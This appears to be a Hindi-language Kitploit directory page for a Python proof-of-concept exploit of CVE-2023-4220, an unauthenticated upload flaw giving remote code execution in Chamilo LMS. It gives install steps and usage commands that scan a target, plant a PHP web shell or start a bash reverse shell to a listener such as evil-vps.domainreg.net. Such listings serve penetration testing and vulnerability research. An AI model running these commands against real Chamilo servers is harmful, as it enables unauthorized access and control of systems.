Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-4220-Chamilo-LMS — यह Python में लिखी गई एक स्क्रिप्ट है जो CVE-2023-4220 में वर्णित Chamilo के LMS सॉफ्टवेयर सुरक्षा दोष के शोषण की अनुमति देती है | Kitploit
उपकरण/GitHubGitHub/rai2en/cve-2023-4220-chamilo-lms
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubrai2en/cve-2023-4220-chamilo-lms

CVE-2023-4220-Chamilo-LMS

यह Python में लिखी गई एक स्क्रिप्ट है जो CVE-2023-4220 में वर्णित Chamilo के LMS सॉफ्टवेयर सुरक्षा दोष के शोषण की अनुमति देती है

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
526 महीने पहलेअभी तक समीक्षित नहीं

Chamilo LMS अनधिकृत बड़ी अपलोड फ़ाइल RCE PoC

यह स्क्रिप्ट CVE-2023-4220 में वर्णित Chamilo's LMS सॉफ़्टवेयर सुरक्षा दोष का शोषण करने की अनुमति देता है। सिस्टम 1.11.24 से पहले के संस्करणों में कमजोर है।

उपयोग

अपनी मशीन पर रिपॉजिटरी क्लोन करें और pip का उपयोग करके निर्भरताएँ स्थापित करें (इन इंस्टॉलेशन को वैश्विक इंस्टॉलेशन से अलग करने के लिए virtualenv का उपयोग करके एक वातावरण बनाने की अनुशंसा की जाती है)

root@kitploit:~
git clone https://github.com/m3m0o/chamilo-lms-unauthenticated-big-upload-rce-poc
cd chamilo-lms-unauthenticated-big-upload-rce-poc
pip install -r requirements.txt

स्क्रिप्ट को Chamilo के रूट पथ (जैसे http://example.com/chamilo, http://example.com या http://chamilo.example.com) के साथ लक्ष्य URL और एक क्रिया करने की आवश्यकता है (उपलब्ध तीन क्रियाएँ हैं: scan, webshell और revshell)।

स्कैन

यह क्रिया /main/inc/lib/javascript/bigupload/files/ एंडपॉइंट तक पहुँचने का प्रयास करके जाँच करेगी कि लक्ष्य कमजोर है या नहीं।

root@kitploit:~
python3 main.py -u http://example.com/chamilo -a scan

scan-demo

वेबशेल

यह क्रिया कमजोर एंडपॉइंट में एक PHP वेबशेल फ़ाइल बनाएगी।

root@kitploit:~
python3 main.py -u http://example.com/chamilo -a webshell

webshell-demo

रेवशेल

यह क्रिया एक bash रिवर्स शेल फ़ाइल बनाएगी और निष्पादित करेगी। ऐसा करने के लिए, पहले webshell बनाया जाएगा, उसी विधि का उपयोग करके जो पिछली क्रिया में उपयोग की गई थी। उसके बाद, bash फ़ाइल बनाने और निष्पादित करने के लिए कुछ कमांड निष्पादित किए जाएंगे। सुनिश्चित करें कि आप nc या किसी अन्य उपयोगिता के साथ परिभाषित पोर्ट पर सुन रहे हैं ताकि आपको वास्तव में रिवर्स कनेक्शन मिल सके। साथ ही, होस्ट एक मान्य आंतरिक/सार्वजनिक IPv4 (जैसे 172.17.1.4 या 186.227.4.31) या वह डोमेन हो सकता है जिसे आपने पंजीकृत किया है (जैसे evil-vps.domainreg.net)

root@kitploit:~
python3 main.py -u http://example.com/chamilo -a revshell

revshell-demo

नोट: जल्द ही मैं Windows होस्ट के लिए एक Windows पेलोड विकल्प जोड़ूंगा

संदर्भ

(CVE-2023-4220) Chamilo LMS अनधिकृत बड़ी अपलोड फ़ाइल दूरस्थ कोड निष्पादन

टूल डाउनलोड करें